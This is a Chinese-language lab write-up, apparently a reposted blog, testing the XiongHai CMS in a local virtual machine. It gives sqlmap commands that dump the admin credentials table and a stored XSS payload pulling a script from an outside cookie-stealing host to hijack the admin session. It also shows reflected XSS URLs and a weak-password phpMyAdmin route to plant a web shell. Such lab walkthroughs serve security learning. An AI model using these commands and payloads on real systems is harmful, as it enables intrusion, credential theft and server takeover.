CMS-熊海網站內容管理系統漏洞測試


開門見山

 


 

在虛擬機中搭建網站,本機訪問http://192.168.31.68/

 

 

 

 


 

一、SQL注入獲取管理員賬號密碼

 

1. 點開一篇文章,存在get請求參數

 

 

 

 

2. 手工注入無果,使用sqlmap,后跟-p接指定參數,驗證是否存在sql注入

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid"

 

 

 

 

 

 

 

3. 爆數據庫

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" --dbs

 

 

 

 

 

 

 

 

 

 

4. 爆表

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test --tables

 

 

 

 

 

 

 

 

 

5. 爆字段

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage --columns

 

 

 

 

 

 

 

 

 

 

6. 爆值

sqlmap.py -u "http://192.168.31.68/?r=content&cid=4" -p "cid" -D test -T manage -C user,password --dump

 

 

 

 

 

 

 

7. MD5解密63a9f0ea7bb98050796b649e85481845  為  root

得到管理員的賬號密碼 admin /root

可以進一步登進后台操作

 


 

二、存儲型XSS獲取管理員cookie

1. 在xss平台上配置監聽端口

 

 

 

 

 

 

 

2. 復制代碼,<sCRiPt sRC=http://xss.fbisb.com/tHbs></sCrIpT>

 

 

 

 

3. 在表單中插入xss腳本

 

 

 

 

4. 發表成功,等待管理員登錄后台查看留言,

 

 

 

 

 

 

 

5. 監聽段得到服務端反彈過來的信息,得到管理員的cookie

 

 

 

 

6. 找到網站后台,登錄抓包

 

 

 

 

cookie替換陳管理員的cookie,並且記得要換上面的目標網址把login.php換成index.php,需要改多個包,發包進入后台

 

 

 

 


 

三、反彈型xss

http://192.168.31.68/?r=content&cid=5' <img src=1 onerror=alert(/xss/)>

 

 

http://192.168.31.68/?r=list&class=3&page=1'<img src=1 onerror=alert(/xss/)>

 

 

 


 

四、Phpmyadmin弱口令上傳一句話

賬號密碼為root/root

進去執行SQL上傳文件語句

phpinfo.php知道絕對路徑

 

 

 

 

 

菜刀連接

 

 

 

 

 

 


 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM